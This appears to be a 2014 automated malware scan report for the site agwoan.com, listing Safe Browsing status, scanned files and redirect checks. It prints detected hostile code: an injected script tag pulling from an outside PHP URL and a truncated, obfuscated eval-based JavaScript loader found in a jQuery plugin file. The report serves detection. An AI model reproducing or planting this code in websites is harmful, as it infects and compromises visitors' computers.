Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=agwoan.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://agwoan.com/ | 200 OK Content-Length: 1858 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://blog.fengshuimyway.com/zt6pxvdy.php?id=26376792"></script> | ||
http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js | 200 OK Content-Length: 85925 Content-Type: text/javascript | clean |
http://agwoan.com/javascripts/jquery.tipsy.js | 404 Not Found Content-Length: 16579 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) z="y";vz="d" "oc" "ument";ps="s" "plit";try{ function(){--(window[vz].body)}()}catch(q){aa=function(ff){ff="fromCh" ff;for(i=0;i<z.length;i ){za =String[ff](e(v (z[i]))-(13));}};};e=(eval);v="0x";a=0;try{;}catch(zz){a=1}if(!a){try{ e(vz)["\x62od" z]}catch(q){a2="_";}z="16_16_76_73_2d_35_71_7c_70_82_7a_72_7b_81_3b_74_72_81_52_79_72_7a_72_7b_81_80_4f_86_61_6e_74_5b_6e_7a_72_35_34_6f_7c_71_86_34_36_68_3d_6a_36_88_1a_16_16_16_76_73_7f_6e_7a_72_7f_35_36_48_1a_16_16_8a_2d_72_79_80_72_2d_88_1a_16_ Antivirus reports:
| ||
http://tubestat160.ru/get.php | 500 Can't connect to tubestat160.ru:80 Content-Length: 189 Content-Type: text/plain | clean |
http://tubestat160.ru/test404page.js | 500 Can't connect to tubestat160.ru:80 Content-Length: 189 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: agwoan.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 05:04:36 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 1858
Content-Type: text/html
...1858 bytes of data.
GET / HTTP/1.1
Host: agwoan.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 05:04:36 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 1858
Content-Type: text/html
...1858 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: agwoan.com
Referer: http://www.google.com/search?q=agwoan.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: agwoan.com
Referer: http://www.google.com/search?q=agwoan.com
Result:
The result is similar to the first query. There are no suspicious redirects found.